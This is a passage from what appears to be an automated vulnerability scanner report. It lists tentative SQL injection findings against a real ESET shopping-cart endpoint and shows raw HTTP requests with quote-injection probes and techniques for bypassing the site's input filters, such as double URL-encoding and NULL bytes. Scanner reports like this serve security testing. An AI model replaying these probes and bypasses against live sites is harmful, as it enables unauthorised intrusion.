Cookie: NLVisitorId=rcHW8415AZeYvnmq%2527; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:50:31 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233801274:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 213

document.write('Error\n');

<!-- 30 50% #10-->
<!-- [ sh.j12.sv ] [ 2011.1.0.45 ]-->
<!-- [ 438708 ] [ ] [ /app/site/query/additemtocart.nl ] [ Mon Apr 25 08:50:31 PDT 2011 ] -->
<!-- Not logging slo
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq%2527%2527; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 15:50:31 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303743154006-383984&Submit.x=41&productId=5051&Submit.y=10&whence=
Expires: 0
NS_RTIMER_COMPOSITE: -1139576511:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:50:33 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

1.7. http://shopping.netsuite.com/app/site/query/additemtocart.nl [Submit.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The Submit.y parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Submit.y parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10'&promocode=&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:42:58 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1121558865:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49062


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10''&promocode=&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:43:03 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2135675922:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54968


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.8. http://shopping.netsuite.com/app/site/query/additemtocart.nl [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19%2527; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:58:08 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1229899696:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 213

document.write('Error\n');

<!-- 33 55% #10-->
<!-- [ sh.j12.sv ] [ 2011.1.0.45 ]-->
<!-- [ 438708 ] [ ] [ /app/site/query/additemtocart.nl ] [ Mon Apr 25 08:58:08 PDT 2011 ] -->
<!-- Not logging slo
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19%2527%2527; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 15:58:09 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303743154006-383984&Submit.x=41&productId=5051&Submit.y=10&whence=
Expires: 0
NS_RTIMER_COMPOSITE: -2027335596:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

1.9. http://shopping.netsuite.com/app/site/query/additemtocart.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1&1%2527=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:22:05 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1565681064:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49112


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1&1%2527%2527=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:22:10 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2135454365:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55027


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.10. http://shopping.netsuite.com/app/site/query/additemtocart.nl [productId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The productId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the productId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051%00'&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:34:00 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
Last-Modified: Mon, 25 Apr 2011 15:34:02 GMT
NS_RTIMER_COMPOSITE: -804036611:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 4773


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>
<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript'>
...[SNIP]...
<!-- v=2011.1.0.45 reason=error -->
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051%00''&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:34:07 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 341950918:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55000


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.11. http://shopping.netsuite.com/app/site/query/additemtocart.nl [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The promocode parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the promocode parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

